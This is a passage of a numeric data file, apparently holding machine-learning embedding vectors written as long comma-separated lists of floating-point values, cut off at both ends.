58,-0.0006328964,0.012796142,0.015324177,-0.0194198,-0.026902819,0.020029942,-0.018096477,0.009348394,-0.00602498,0.018937707,0.0024113879,0.010415539,0.015839761,-0.011170214,0.019672316,-0.0012722358,0.013811783,0.031383105,-0.0077845072,-0.00037511607,0.0065846643,0.01096973,0.007566122,-0.033215288,-0.00404359,0.0009877429,0.040481634,-0.011392903,-0.01721103,-0.013889043,-0.005325885,-0.010548783,-0.0020513143,-0.024302306,0.0058575994,-0.0023693417,0.0028244096,-0.008109732,-0.018149447,-0.014860901,0.016976397,-0.019320222,-0.012886595,-0.04498187,-0.009908696,0.0011126671,0.0043768366,-0.00028233073,-0.01172599,-0.0014320508,0.00359305,-0.007083352,0.013592845,0.026726114,0.033034317,0.007416754,-0.006675615,0.007580036,0.0024728617,0.02454991,-0.0027940096,-0.0038314182,0.05078056,-0.006313507,0.00048709198,0.003233917,0.0010475998,0.029414289,0.019482786,0.00021902048,0.004380446,0.009688298,0.012937315,0.030181501,-0.0005156367,-0.016374335,0.0069127027,0.03004557,0.025706949,0.019648872,0.0019309759,0.028528498,0.01680596,-0.0018434097,0.032127243,0.012798735,0.0019260811,-0.02326367,0.008369079,0.006518609,0.022773497,0.0021420592,-0.006600556,0.01823679,0.015194942,0.0038861255,-0.021625394,-0.011508748,-0.004876981,-0.016743196,-0.013763633,-0.027908172,0.011042359,0.0017954551,-0.03305855,-0.008311687,0.015388857,-0.0074569676,0.010475583,-0.009485476,0.023408893,0.00779987,0.0039752345,0.0034368085,0.005753834,0.00044640125,-0.024314526,0.004977013,0.02066046,-0.0037292605,-0.030091725,-0.012679918,-0.007901854,-0.04064391,0.015354673,0.0015058386,-0.005013456,-0.019280821,-0.0038027086,0.013387823,-0.005817195,-0.013585782,0.030891275,-0.005384189,-0.021050675,0.036174092,0.025927963,-0.006220793,-0.015342608,0.0037638403,0.021874646,0.021426728,-0.02081543,-0.00016133094,-0.020777462,-0.0057434663,-0.017061267,-0.005138115,-0.012781089,-0.00958864,0.0006821685,0.015391243,0.003508772,-0.022465356,0.04260151,-0.022464907,0.020915693,0.011125622,-0.0022982825,-0.010446585,0.015082775,0.004660566,0.018889287,-0.026225258,0.021713793,0.0002205729,-0.04322309,-0.015701745,-0.007273021,0.0019432126,0.008452213,0.007855802,-0.036288224,-0.035125833,-0.01021688,-0.0043941424,0.0040687476,0.024878515,-0.01854275,0.01311686,0.017752826,0.01687413,0.004541957,-0.00020298596,-0.014632277,0.009227361,0.009623591,-0.010070229,0.01305294,0.03517241,0.0056304676,0.01859107,0.017681705,-0.03201861,-0.021668406,-0.019882504,-0.0054428075,-0.015239369,-0.0041867513,0.006303257,-0.0040236544,0.017125051,-0.02446011,-0.00470785,0.03603356,-0.01343335,0.0075792554,0.010162347,0.03073513,-0.016181596,0.0014484193,0.012483829,0.009354725,-0.0075718896,-0.012625524,-0.03332739,0.013612798,0.00419839,-0.016588155,-0.013494072,-0.008822725,-0.013386056,-0.001859495,-0.016648298,0.010493674,-0.0038968483,0.011512131,0.008274564,0.007953623,0.01522073,-0.0037083428,-0.0020710563,0.016099839,0.0074482085,-0.0007055926,-0.010870495,0.002100235,0.0028517619,0.0016363217,0.030197773,0.014376038,0.0021393267,-0.021285124,0.005197609,0.021030445,0.008288211,-0.01949903,0.02585555,-0.003419301,-0.0111649735,-0.017588733,0.0059328144,-0.0053089117,0.0070287967,-0.013662778,0.00155727,0.0073078326,0.011024153,0.0074471687,0.061599877,0.006807153,0.003986337,-0.010700492,0.012809595,-0.021118399,0.012832568,0.01470541,0.01689532,-0.009875114,-0.024955537,-0.01530809,-0.009693686,-0.0102291135,0.014455901,-0.007073218,0.019831855,0.002133342,-0.0034472044,0.0033590074,0.008034716,0.0014154515,0.0062333285,0.011803425,0.0021032826,0.014751046,0.030090109,-0.02935862,0.010205757,-0.008078838,0.00036883287,-0.01921708,-0.01534166,0.022054853,-0.015982933,0.000338857,-0.004768849,-0.018390369,-0.015168857,0.003946714,-0.0070698624,0.001311529,0.04019596,0.0024594185,0.0072600683,-0.006466139,-0.007044478,-0.014416583,0.011063074,-0.0013144796,0.0047023566,0.0037505215,-0.0053648376,0.019031152,-0.036158126,0.013035607,0.00507944,0.0035883181,0.014120216,0.00080473477,0.0066234116,-0.006531433,0.0077568563,-0.011293408,-0.015123067,0.0024639221,-0.0027368418,-0.016577356,0.0055829585,-0.032268222,-0.0015816484,-0.00359002,0.0037089277,0.010390148,-0.014274723,0.009354504,0.0040403986,-0.031776167,-0.02205397,-0.025209283,0.0069405264,-0.0071500316,0.02649904,0.01254546,-0.021245327,0.013821552,-0.0041537466,0.0128069855,0.0635089,0.01532206,0.022367138,-0.00806945,-0.011396639,0.020153882,0.016365537,0.017884115,0.009021873,-0.0036925278,-0.0248114,0.028610379,0.015894687,0.012654419,0.0114654945,-0.013274262,0.017698895,-0.012679828,0.0073663457,-0.002912677,-0.0025455712,0.024955679,0.011499838,0.010270826,-0.0015086872,-0.00007085187,0.0011427932,-0.0025840397,-0.005263272,-0.028081683,-0.00024187112,0.011112388,0.0021338647,-0.012445898,-0.006416824,-0.038923983,0.018344952,0.13234073,-0.014388841,-0.0026099537,0.0392591,-0.0053078714,0.0088810725,-0.12702094,0.011778061,0.0009053075,-0.00624224,-0.0031179893,0.0028246217,-0.017391814,0.013971649,0.011312927,0.0002740688,-0.017192924,-0.016949791,0.028469969,-0.015393529,-0.009966041,0.0022755938,-0.0017819594,0.0068268315,-0.021233812,-0.0137411915,0.014485594,-0.023494214,-0.008780504,-0.022020578,0.009806207,-0.0035156948,0.016615087,-0.015325659,-0.020531729,0.0087278355,0.016722042,-0.004323249,-0.000045437977,-0.006113102,0.014140608,0.01641438,-0.012014992,-0.035261888,-0.13265625,0.012871616,-0.008065121,-0.045541212,0.01689154,-0.02503525,0.004498868,-0.0026904233,0.026101248,0.01145996,-0.015162854,0.028386872,-0.001117485,0.0008115834,-0.016905261,-0.008052204,0.00884628,-0.0038557234,0.0135246795,-0.007275486,0.006448313,0.00036155534,-0.012621115,-0.020350084,-0.011966944,-0.0019170285,0.0050506922,0.0019134372,-0.0039130826,-0.001526717,-0.012608535,0.009778017,-0.016276184,-0.0012204524,0.0007168291,-0.021458339,-0.013472356,0.0028081893,-0.019067677,0.034764547,-0.02097008,-0.0015291993,-0.0037932254,-0.005495277,0.0067265225,0.00873269,-0.0008483688,0.018412177,0.027701491,0.00054166495,0.03156241,0.005297225,-0.026117967,0.010793037,-0.0067789205,-0.011222388,-0.0085272435,-0.048486244,-0.016322078,0.00892416,-0.0073300647,-0.009991547,-0.032495484,-0.012054806,0.034255836,-0.0054459046,0.007929765,-0.031571884,-0.01048338,0.01951851,-0.013939926,0.011887985,0.0033102944,-0.01227013,0.02016743,0.0067429426,-0.0057018427,0.020471536,0.015340171,-0.007101559,0.02381203,-0.017658293,0.013738441,-0.03760543,0.0013599012,-0.022370717,-0.008127956,-0.0072237514,-0.033816773,-0.0061323037,0.030167393,-0.016472425,0.021997388,0.0070842435,0.020407012,0.0021832664,0.03485017,-0.011142817,-0.016552232,-0.007971537,0.012662128,-0.012837898,-0.024256771,-0.01003329,-0.014301591,0.0051330766,-0.017923566,-0.029146425,-0.036898155,-0.014091008,-0.0128711,-0.025545038,0.022332799,-0.015167253,-0.033592418,-0.0152510945,0.028691625,-0.00095458236,0.023869613,0.008974233,-0.018314365,-0.005713858,-0.019306136,0.0060747857,0.037092518,0.024012893,-0.012107994,-0.0134737305,-0.010922886,0.007113144,-0.0317719,0.017135372,0.00066346297,-0.0024721716,-0.020608997,0.0035156396,-0.011492605,-0.0021342202,-0.041403715,-0.011713174,-0.0076672337,0.02071928,-0.01217169,-0.00091021915,0.0047887843,-0.027863309,0.034348693,-0.0036518357,0.03178636,-0.0003580865,0.013745731,0.027650619,-0.02206263,-0.02383579,0.004995354,0.046783194,0.005145136,-0.0154469935,0.009984501,-0.0154554425,0.028239388,0.013258565,-0.010622254,-0.0031962537,-0.014529121,-0.016456462,-0.00033082295,-0.015272387,0.019241558,-0.01647046,0.022736896,0.006645546,0.0063106567,0.009228565,-0.0025879971,0.012785973,-0.023847459,-0.009562976,0.017579067,0.017387496,-0.009227693,0.02473678,0.005588673,-0.008719096,-0.0072717364,-0.027729189,-0.013422424,-0.014645638,0.0057483646,0.011867378,-0.053320147,-0.024930686,0.014089388,0.021280253,-0.011911531,0.0041185776,0.02306536,0.012907051,-0.028850758,0.01543985,-0.024111737,-0.022768313,-0.012951223,0.011367638,-0.006961621,0.013725886,0.0060798107,-0.016152931,-0.020811856,0.0016635979,-0.0015123519,-0.0028594784,-0.0089788465,-0.009529891,-0.007310793,0.006688704,-0.016559059,-0.030565074,0.013303733,-0.023964934,-0.0022560442,0.003750447,-0.0056823455,0.0076289736,0.019075645,-0.012335438,-0.009776177,-0.018344713,-0.002168993,-0.010483339,-0.0024654607,-0.014597555,-0.015448002,-0.018099874,0.037234597,0.01928403,0.030294038,0.0038406944,0.0025671227,-0.030290091,-0.05174398,-0.023798328,0.04148387,-0.01606406,-0.0001482303,0.012221244,0.02607116,0.009652816,-0.004804728,-0.000682464,0.019029237,0.01900047,0.0008301721,0.017872943,-0.021843636,0.007000552,0.023042517,0.016017174,-0.014096989,-0.0025070326,-0.01685763,-0.0073323366,0.033848718,0.011850819,-0.0041394155,0.0010512983,-0.0048424513,0.00609486,-0.017038897,-0.00038506047,0.04897676,-0.0067528253,0.026797306,0.027634192,-0.0011939096,-0.018104035,-0.012005855,0.002874989,-0.011004175,0.0029929804,-0.009711172,0.01065861,0.009966058,-0.028428786,0.022409359,0.011403571,0.012483305,-0.0011152269,-0.0014609674,0.0041362387,-0.020235475,0.01719313,0.035259016,0.011393524,0.015513263,-0.016057547,0.003023683,0.00044295043,0.012840115,-0.020823132,0.004255381,0.007392642,-0.004871903,-0.026948508,-0.0066076964,-0.034564868,0.027965372,-0.010894049,-0.007832158,0.009462457,0.013033778,-0.015337524,0.005843852,-0.0046149436,-0.011979542,0.0011659818,0.05610948,-0.002072808,0.00511128,-0.018392783,0.025584202,0.032033123,-0.008235213,0.00916525,0.0010946895,0.010853545,0.0050133523,0.012502117,-0.0044162003,-0.005543449,-0.01717653,-0.0035459807,0.021207167,-0.008630581,-0.009418058,0.009041763,0.015212093,-0.00479695,0.003617578,0.000639134,0.019339498,0.0006233719,0.031553786,-0.014847954,0.018025866,-0.0026563718,0.020625144,-0.010483555,-0.0037371807,-0.017026125,-0.008871969,0.007475285,-0.0047961557,0.009591414,-0.011462026,0.004044459,0.024875833,-0.0063343113,0.00080024905,0.007332154,-0.013041622,-0.0030905006,-0.026609402,-0.008425856,0.004308054,-0.024889043,-0.001380428,-0.009471338,-0.0067913975,-0.007354903,-0.013208295,-0.0034885898,0.02165487,-0.010452084,-0.027788114,0.005386075,0.027094483,-0.0048310864,0.0056207716,0.008502203,0.0086295875,-0.024002654,0.06735437,-0.022167927,0.0063693766,-0.011287294,0.040567998,0.0027132886,0.004211383,-0.009278038,-0.015108733,-0.021583255,-0.013563791,-0.025964217,0.009979841,-0.02221542,-0.014197141,-0.016220117,0.020440461,-0.010801672,-0.0035311244,-0.017428193,0.004688007,-0.012866516,0.015639907,-0.0062599666,-0.016671618,-0.05163407,0.0019944697,0.021307493,-0.028718142,0.016726296,0.0073746247,-0.009632086,-0.01574164,-0.005535379,-0.007926925,0.0012221617,-0.0038962357,-0.0068785273,0.021351315,0.024027562,0.01837534,-0.00010034227,-0.0039689564,0.011386637,-0.0027096246,-0.004251822,0.0054232855,0.007862096,-0.023231003,0.010279865,-0.0041603805,0.0032986042,0.019968467,0.011248464,-0.022668552,0.015458505,0.009185784,0.00063587807,0.009241582,0.005516216,0.028086102,0.0006051983,-0.031552732,-0.024981016,0.027358612,0.02169078,-0.013553905,-0.021432968,-0.021993414,-0.0027059277,-0.0145410905,0.012548397,-0.011369213,0.018155118,0.010027784,0.006698911,0.013285361,-0.019914228,-0.0062753363,-0.00011745671,-0.00057541963,0.019855985,-0.0036006197,-0.018313464,0.005134525,0.018957611,-0.0024812971,0.01982234,-0.014506408,0.03002667,0.04309124,-0.011210391,0.01669952,-0.0016093267,-0.009980349,0.007956111,-0.015731474,-0.006796041,0.018247902,-0.014216426,-0.021186225,-0.010566733,-0.012933964,0.008998411,-0.006216177,-0.005871438,-0.05213624,0.010721252,-0.018768689,-0.003149893,0.0068656243,-0.021960136,0.0061341445,0.023532277,0.005277368,-0.055221774,-0.009685964,0.02911222,-0.0035075312,-0.00039408854,-0.0078785615,-0.01751209,-0.028629072,-0.021760397,-0.0035896406,0.018717911,0.009712458,-0.015127884,0.0030644874,-0.01239455,-0.0102692,-0.011398977,-0.013163932,-0.008076841,-0.002279084,-0.000020891557,-0.0125295315,-0.017613338,0.014728448,0.010790074,0.0017612544,0.0014282975,0.003229408,0.0102452915,-0.0016415236,0.018287497,-0.00041018645,-0.0053992374,0.004834513,0.0060799303,0.017296199,-0.0045234584,0.0067587243,0.024875645,0.017227886,0.048965264,-0.019050077,-0.006769053,0.009294327,-0.014419884,0.0019144464,-0.041511033,0.015562128,0.0062329974,0.009938798,-0.007438052,-0.015119121,-0.002158681,-0.0071572843,0.0034610508,-0.008774851,0.017616307,-0.005496687,0.006665023,-0.019406803,0.0024779865,-0.014137074,0.010699734,-0.008039452,0.00080659264,-0.001247445,0.01578285,-0.00669453,0.0073372805,-0.020953657,0.018026484,-0.026293999,-0.016946102,-0.009235347,0.033196323,0.00053373096,-0.016268132,0.006040012,0.020968523,-0.016396094,-0.00045767459,-0.0016502625,-0.0030525615,-0.0040190886,-0.022680426,-0.025643507,0.017465914,-0.0021282323,0.01159054,0.008535945,-0.0010312011,-0.010368544,0.011457473,-0.019586418,-0.011817879,-0.11799044,-0.018377248,0.018298775,-0.007320186,-0.0037095975,-0.010747275,0.0034232796,0.00047104902,0.02987116,-0.0011983098,-0.017492607,-0.0019785096,-0.0047112475,-0.0010449211,0.001420612,0.00046433168,-0.035376236,0.0020789278,-0.008554496,-0.013729199,0.00013890397,-0.023705501,0.012470566,0.0028740412,0.003789346,-0.009462838,0.019905664,0.028054783,0.014497246,0.0033030014,-0.0073048235,0.012026167,-0.018793924,0.0018042478,-0.012283723,0.0048264335,0.009595848,-0.0070427223,-0.001648136,0.023849564,0.0054932726,0.01128583,0.015831422,0.012905535,-0.011941268,-0.0006531862,-0.00021517278,0.012663291,0.009377084,-0.013997019,0.0025505745,0.008852425,0.001288279,-0.012239571,-0.017301572,-0.023550069,0.007651892,0.017676288,0.0062940093,0.010861398,-0.017045857,0.021528417,-0.023982862,0.015106809,-0.011142744,0.004912037,-0.011806484,0.019735316,-0.0032017468,0.0006072398,0.013694498,0.029453829,0.007846303,-0.022780173,0.020040423,0.015341122,0.0071694353,0.01671677,0.016247222,0.0029570335,0.005675696,-0.03266059,0.0015268826,-0.00023267951,-0.025591137,0.013585311,-0.004136012,-0.008131539,-0.01802932,-0.013127946,0.019454835,0.0057373336,-0.0115937125,0.0082164,0.00882103,0.012469908,0.06746561,0.006690594,-0.022303961,-0.008368188,-0.011412978,0.0021309482,-0.01428182,-0.007088498,-0.015069141,0.019213935,0.011212862,-0.01691186,0.008913381,0.0035284527,0.0031199355,0.031506624,-0.021619197,0.003621525,0.0030058755,-0.0132062305,-0.014648663,-0.013171644,0.009076002,-0.0025608733,0.018919704,-0.0042317114,-0.004583728,-0.031695586,0.0015688979,-0.029445415,-0.02079153,0.021204751,0.010514336,-0.008297807,0.006749443,-0.007189473,0.00832041,-0.012833376,0.006544039,0.014645504,-0.017997315,0.0038791508,0.005517189,0.0057894993,0.013374961,0.0012167727,-0.0072032074,-0.010409451,0.004945308,0.010820844,-0.008346769,-0.0020992993,-0.015029578,0.021689927,0.0048564896,-0.023388889,0.014226144,0.03419039,0.0067456616,0.01273687,-0.01255908,-0.0012657272,-0.009201634,0.013663437,-0.016964098,0.034879807,0.047717724,0.004185191,-0.0026901374,-0.015424526,-0.0014001512,-0.00036974455,-0.008284827,0.00875537,0.0015460064,0.004852422,0.016678788,-0.050991125,-0.009740784,0.008936383,0.013034731,0.018868731,0.037709225,0.029027505,-0.009917517,0.0074473843,-0.011149049,-0.011961952,0.013849368,0.022675386,-0.024190892,-0.0078004226,-0.0013879668,-0.004588423,0.032671604,-0.012165784,-0.016300475,-0.026727488,0.0017479461,-0.01277494,0.00012258912,0.034236833,0.021276962,-0.005283738,-0.0144459875,0.006106361,0.020689623,-0.02672349,0.0016983257,0.0076491428,-0.00012576328,0.02217676,0.0097809695,-0.023272943,-0.018214898,-0.00952705,-0.009549399,-0.01185165,0.004911199,0.016176261,-0.02621689,-0.02114215,0.009446469,0.008361737,-0.019686049,-0.026150938,0.019554611,-0.0020551088,-0.0009432864,-0.0008668962,0.041982427,0.033583798,-0.009429932,-0.023259807,-0.005771782,-0.009520237,-0.027675081,0.00027789248,0.040833887,0.012783849,-0.006290829,0.010068206,0.010646586,-0.0010733648,0.029591447,0.026193932,0.020390125,0.028861308,-0.0005525895,0.0013439686,0.00084364443,0.023554815,0.011202802,0.035533838,0.0006455077,-0.0074688536,0.0030797315,-0.008332392,0.0011973255,0.0012498813,0.011721274,0.010692725,0.013269089,0.030175231,-0.015355004,-0.0174883,-0.020301389,-0.005980852,-0.006338162,0.002139965,-0.0034411333,-0.010947159,0.002980694,0.0031639112,0.03059759,0.017964039,-0.009564875,0.018812329,-0.0072389343,-0.011620438,-0.02514164,0.0011306874,0.007743782,-0.006531686,0.011111691,-0.0110691255,-0.014207693,0.015935652,-0.004577064,0.008633019,-0.011551046,0.012197013,-0.021086631,-0.010896462,-0.000751354,-0.0084879575,0.006924907,-0.01661103,-0.0019360184,-0.009528574,0.019423252,0.000050380742,0.0045972066,0.010731887,0.027140284,0.000117255906,0.008123807,-0.01322342,0.0061751683,-0.018102244,0.003508404,0.03714542,0.0038821883,-0.010986789,-0.011576153,0.015667293,-0.0016512244,0.006573728,0.0046748267,0.00268731,-0.000102458485,0.022657309,-0.02408283,-0.011960135,0.004353104,-0.0042723846,0.004926857,-0.0033133808,0.009219524,0.006558153,0.023510577,0.017181702,-0.016020017,-0.014878099,0.034757365,-0.00031512603,-0.00983953,0.0014004721,0.017234549,-0.017207857,0.0088747265,0.02614141,-0.01704363,0.008278783,0.000078005905,-0.0032685627,-0.0018393699,-0.013391001,0.015263697,0.012500693,-0.0068220627,-0.0033078294,-0.00085427426,-0.002814117,-0.0007315781,0.0106744105,0.0017557741,0.009263523,-0.0057043475,0.0023872186,-0.027925666,-0.009258226,0.01821326,0.0025723444,-0.007754105,0.004144764,-0.016211621,-0.005277708,0.0012300741,-0.010214203,-0.0057425727,0.0076428247,-0.027828809,-0.00048790054,-0.020520575,0.022258796,-0.027107947,-0.022575447,-0.0005461041,-0.098163605,0.012667281,0.01652351,0.004025766,0.05668565,0.022809159,-0.0050897677,-0.020308988,-0.015783276,0.000107107495,0.0055448716,-0.002830883,-0.023785137,0.0015977715,0.043667555,0.0040390254,-0.005032519,0.00586394,0.0124482745,-0.020860916,0.005387698,0.0041622254,-0.006240224,0.0013380916,0.024768448,-0.012492577,-0.015902085,-0.006419026,0.004357813,-0.0076238923,-0.019510252,0.0037247227,-0.002082122,-0.0054268898,-0.007922418,0.00459222,-0.0060681305,0.00908297,-0.025778722,-0.028240604,0.0059755547,0.017453965,0.006469884,0.000045347442,-0.030239947,0.014617714,-0.029025936,-0.009601408,-0.009272459,-0.016201876,-0.0061430517,-0.0010860094,0.011015138,0.005363732,-0.0057049217,0.025472146,0.0069288337,-0.008209393,0.0047820755,-0.0006546451,-0.017265696,0.0072819167,0.0058668135,0.019772658,-0.009476624,0.014352424,0.0032805752,0.008591009,-0.002317339,0.009394696,-0.0034966872,-0.044516165,-0.019238438,-0.015622432,0.0040371823,0.013210929,0.0034119037,-0.012671581,-0.0033628414,0.011358023,0.034983046,0.0061081895,0.019884948,0.004237653,0.01735346,-0.015861351,-0.0074550975,-0.013542252,0.02310581,0.0050910166,-0.022022055,-0.0058257463,0.030463358,0.0068737674,0.0067177843,-0.00013167206,0.00012629986,0.0070030764,-0.008244995,0.024791224,-0.0025190008,-0.004634012,0.0077140657,0.0054911133,-0.014691737,0.008097196,-0.0007738507,-0.0046695736,-0.004618414,-0.026547013,-0.01074162,0.025535773,0.019880826,0.0453903,0.012750641,0.022095924,0.012766565,0.019404799,-0.026032832,-0.021134371,-0.017909162,-0.008745294,-0.010450762,0.018690266,0.017205419,-0.008350194,0.0027737631,-0.008416441,-0.021775993,0.020937627,-0.00975833,0.041087724,0.015610551,0.003481041,-0.014390594,-0.010118011,-0.034899972,0.011697922,0.00038334285,0.014436438,0.010215511,-0.024360847,-0.000181109,-0.0019899202,-0.023773171,0.019262077,-0.000047163572,-0.0045749205,0.025609938,0.0033780436,-0.011839627,0.0047087036,0.004823782,0.007511065,-0.008011431,-0.006743778,0.0024907622,0.007368823,-0.019403081,-0.015504288,-0.0046170475,0.0029535708,0.026362557,-0.00035909377,-0.019189935,0.011697408,-0.009361711,-0.0069420193,-0.017240979,-0.012555847,-0.02091819,-0.019541822,0.003727652,-0.0049012406,-0.016800798,-0.006784868,0.033300806,0.015397698,-0.009529569,-0.024203403,-0.024765275,0.015611617,-0.018880788,-0.020583054,0.0017079824,0.003557651,0.0013294235,-0.019784568,0.023785476,0.0017840303,-0.00610492,-0.008818878,-0.014665313,-0.015851157,-0.006137041,-0.006217595,0.0127251,-0.016812965,-0.006459,0.011511901,-0.017284751,0.006220903,-0.032387838,0.017172458,0.0175224,0.02453098,0.0048919744,0.014162951,0.0006222539,-0.0015500956,-0.017055802,-0.0022838032,0.01211374,0.108552404,-0.0054498385,-0.010310928,0.0020639962,0.004938311,0.010744698,0.024213748,-0.014976902,-0.011403028,0.0010315736,0.023331273,-0.02294573,0.008079517,-0.013914995,-0.009800267,0.02406141,0.003950412,-0.02576702,0.016993517,0.0030777478,0.0053483634,-0.008364435,-0.0398801,-0.02475455,-0.0066246516,-0.06455431,0.032815687,0.008065883,0.011119529,0.024833808,0.018108655,-0.0014382664,0.0039310674,0.027706113,-0.022783283,0.0015116103,0.005238232,-0.009723383,-0.0020733073,-0.010188628,0.011777041,0.003010502,-0.006316906,0.0011673262,-0.020867089,-0.018296752,0.011539174,-0.010067618,0.00013956091,-0.02177718,0.0008423313,0.0009871672,-0.0122344885,-0.000659952,0.0030025064,-0.017800657,-0.0022795585,0.016026981,0.019940117,0.004617541,0.025014453,0.016359653,0.001146039,0.0028832036,-0.0029300794,0.010752774,-0.024504926,-0.009374873,0.0032949732,-0.019777589,-0.003400049,-0.017099518,0.008540155,-0.009891689,-0.011731247,0.001542572,-0.0076997606,-0.0074995193,-0.016069377,0.0060278773,0.015616078,-0.015100975,0.0123055605,0.0016615546,0.002255109,-0.003550845,-0.0024328385,0.012105293,0.01316616,-0.008164342,-0.021313453,0.013648577,0.028303202,0.018594665,-0.011233919,-0.0013878281,-0.003164773,0.01560021,-0.02700284,-0.0077589047,-0.009336639,-0.021727713,-0.002146154,-0.0018932627,0.0057945265,-0.013205669,0.0066325986,0.026376972,-0.011997239,0.0070245867,0.0052843434,0.016169297,0.011606571,0.0175625,-0.004787966,0.018225482,-0.009900183,-0.011875089,0.02593596,-0.017844534,0.004291177,0.013580402,0.01878324,0.03115535,0.010220646,0.0047489856,-0.018049272,0.0021170543,0.0010336043,-0.012522818,-0.008630299,-0.031579964,-0.011332556,0.0315099,-0.014925997,0.0033714122,0.017598068,0.004502846,0.013156215,0.02704762,0.010767032,-0.01778534,-0.013331133,-0.008715183,-0.0023802957,-0.027681138,0.026437499,-0.0019441601,0.02528671,-0.01745973,0.023443196,0.017546888,-0.026006429,-0.0127842715,-0.0039996407,-0.015949396,-0.0058625536,0.002163667,-0.0037118809,-0.016200893,0.007648201,0.00562198,-0.0051340787,-0.052465323,0.02513511,0.026318254,0.015098096,0.013930902,-0.005406735,-0.011360444,-0.011608908,-0.0036762767,0.006904614,0.0055265175,0.0007092598,0.0018451245,0.0030489767,0.021458905,-0.022601865,-0.0019080986,0.032936424,-0.012883934,0.011431819,0.0050629806,0.01628844,-0.0031186515,-0.01788501,0.010410993,-0.02218205,0.011200119,0.006079347,-0.0022062378,-0.00058904715,-0.0012975535,-0.0037011092,0.01582645,-0.02682778,0.02090718,-0.023421144,-0.044097476,-0.023826815,0.009365334,0.0064392774,-0.019460378,0.0060421713,-0.008450487,-0.007042055,-0.0061039296,-0.0146298,0.0070315697,0.024975304,-0.012669484,-0.010414374,-0.033888094,-0.016722333,-0.0053204736,-0.011896184,-0.0160591,0.0009094331,0.0017217639,-0.0035437855,0.0033268488,0.0021469477,-0.006076809,-0.0003054898,-0.007898093,-0.016949568,0.010076687,0.0132319005,-0.019949902,-0.020347483,-0.012759233,-0.0035583915,-0.012709136,-0.016269878,-0.015276474,0.015631245,0.02946119,0.005540996,0.020625126,-0.01610476,0.007520924,0.00538467,0.0132728545,-0.017068464,0.014141888,-0.0045370418,-0.009918589,-0.0031747797,-0.017200403,-0.026352184,-0.007912672,-0.012805139,-0.013277987,-0.02415266,-0.013505382,-0.0161263,0.006373034,0.023289092,-0.0142553905,0.0068559856,0.0047568623,0.0060324417,0.009879931,-0.008022539,0.000641836,-0.0023460013,-0.016218895,-0.00288108,-0.0035335354,0.0025347287,0.000056658762,0.0012349555,0.02309775,-0.0060609058,0.008576811,0.0008183523,-0.0019375598,-0.0038634797,0.003821851,0.0069413283,-0.0203291,-0.0028996957,-0.022198886,-0.012086661,0.011178633,-0.008563294,0.022331377,0.039880242,-0.06319267,-0.018268693,0.016665334,0.006433649,-0.010118795,0.024182584,-0.00054944993,-0.0315926,-0.02462884,0.023808004,-0.0008945929,-0.0032946707,-0.030547123,-0.0074069845,0.026575107,-0.0045248345,-0.013853919,-0.0027737147,0.0036982566,-0.02382559,0.023466974,0.019958876,0.0013493734,-0.012598026,-0.018144408,0.01123762,-0.023779254,0.009263251,-0.020008862,0.023623277,0.0098831225,0.004699963,-0.010142932,-0.006897674,0.010601387,0.0009298609,0.0071525727,0.017997714,-0.024759922,-0.022141958,-0.020154921,-0.010388432,0.032031253,-0.0020010595,0.0051505635,-0.025036274,0.020214058,-0.003911095,0.14385764,-0.005159073,0.00011976927,-0.00620112,0.0074090366,-0.005698261,0.014246136,0.019917727,-0.0060670446,0.030272378,0.021042336,0.004031317,0.005864137,0.025466537,-0.021563387,-0.022302242,0.009737762,0.1391879,-0.026224975,0.02136381,0.017726686,0.02229159,-0.0067459145,0.016376043,0.013604861,-0.07948229,-0.016282696,-0.039852325,0.010428182,0.013963358,-0.040294286,0.012630576,0.022189818,-0.008990651,-0.016128872,0.0041656485,0.0066343113,0.006606954,-0.032456726,0.005984378,0.004436678,0.0016287043,-0.0074881567,0.012000887,-0.0067148134,0.0070027704,-0.033735026,0.0010516185,0.01969978,0.0178714,0.012318982,-0.01046395,0.027062211,0.009803575,0.0057248245,0.028695451,0.0027669277,0.005628239,-0.032952257,0.011790629,-0.00091382687,0.006979355,0.0004637219,0.025274292,-0.013719807,-0.00980215,-0.017771676,0.0124874,-0.0025754513,0.021102263,0.032931328,0.025572527,-0.011353868,0.011249991,0.034052692,-0.022708297,-0.009353127,0.007806243,0.022209732,-0.01275407,0.024188071,-0.003988995,0.00018077712,-0.0050766445,0.0036151398,-0.0075844433,0.0023975405,-0.007481483,0.022485472,0.002597991,-0.017813412,0.0009894279,-0.018715372,-0.0015572101,0.023761192,0.013375424,0.0059116893,0.0016319726,0.008258562,-0.015011167,-0.0025917857,0.009767517,0.006167947,-0.013271359,-0.016942577,-0.0081904,-0.01905564,-0.02443518,0.00035383887,0.008260191,0.031371977,0.018431757,0.021733914,0.020312754,-0.0041828854,-0.009942514,0.0015724794,0.009908845,-0.023946287,0.010532134,0.0033962296,0.0042384844,-0.0074523073,0.020657472,-0.022472443,0.0059385207,0.012689691,0.006840858,-0.018220412,-0.004439141,-0.012825677,-0.0019824195,-0.00029805806,0.05466415,0.009296298,-0.0152843585,0.024763996,-0.036934346,-0.02285142,-0.009791608,0.0034993629,0.0027482377,0.0025494806,0.006137851,-0.012288436,-0.006009953,0.010939521,-0.011038293],[-0.018368142,-0.017516326,-0.021470178,-0.008425278,0.008072858,-0.025985569,-0.009184764,0.022648348,0.0020830058,-0.0001158282,0.0043600574,0.027209053,-0.0074536474,-0.029767456,-0.037780076,0.0012112109,0.006787261,-0.016392082,0.010957854,-0.011850277,0.009620634,-0.0052744457,0.0201941,-0.018494617,0.0077026356,-0.006550459,0.0019534137,0.000037707407,-0.006243887,0.0061329533,0.009032344,0.020073365,0.006776795,-0.008325767,0.014038337,0.018789683,-0.015987229,-0.021716405,-0.00059230457,-0.00611729,-0.0037333255,0.007171337,0.01817172,0.013397483,-0.014038819,0.007887819,-0.014706218,0.02215872,-0.01839584,-0.00329263,0.0008493287,0.0024609352,-0.010528064,0.013011686,0.013382838,0.029669262,-0.0022093267,-0.013391058,-0.0009303424,-0.027352568,-0.0014196273,0.0028006881,-0.0039601247,-0.009511167,0.0010054498,-0.019120635,0.025654314,-0.015991064,-0.01808983,-0.018769583,0.0034719114,-0.01236533,0.007709792,0.0042742374,0.020327518,0.016618125,-0.0037565846,-0.020186203,-0.024240425,-0.011331103,-0.008224295,-0.010904012,-0.0037151035,0.0027459944,0.0023970965,-0.013516164,-0.012990773,0.00853565,-0.014637625,-0.006385747,-0.0007300379,-0.0072034122,0.0014561597,0.0051116897,-0.024853833,0.00998594,0.020207698,-0.011006481,-0.011806329,0.022309622,-0.0027302178,0.0077115675,-0.02677625,0.011148116,-0.0014679312,-0.01983404,0.008523117,-0.0057963664,0.000893127,-0.010305351,-0.005190598,0.005360793,0.0054349424,0.0117570115,0.019701572,-0.010885812,0.0104360785,0.015403561,0.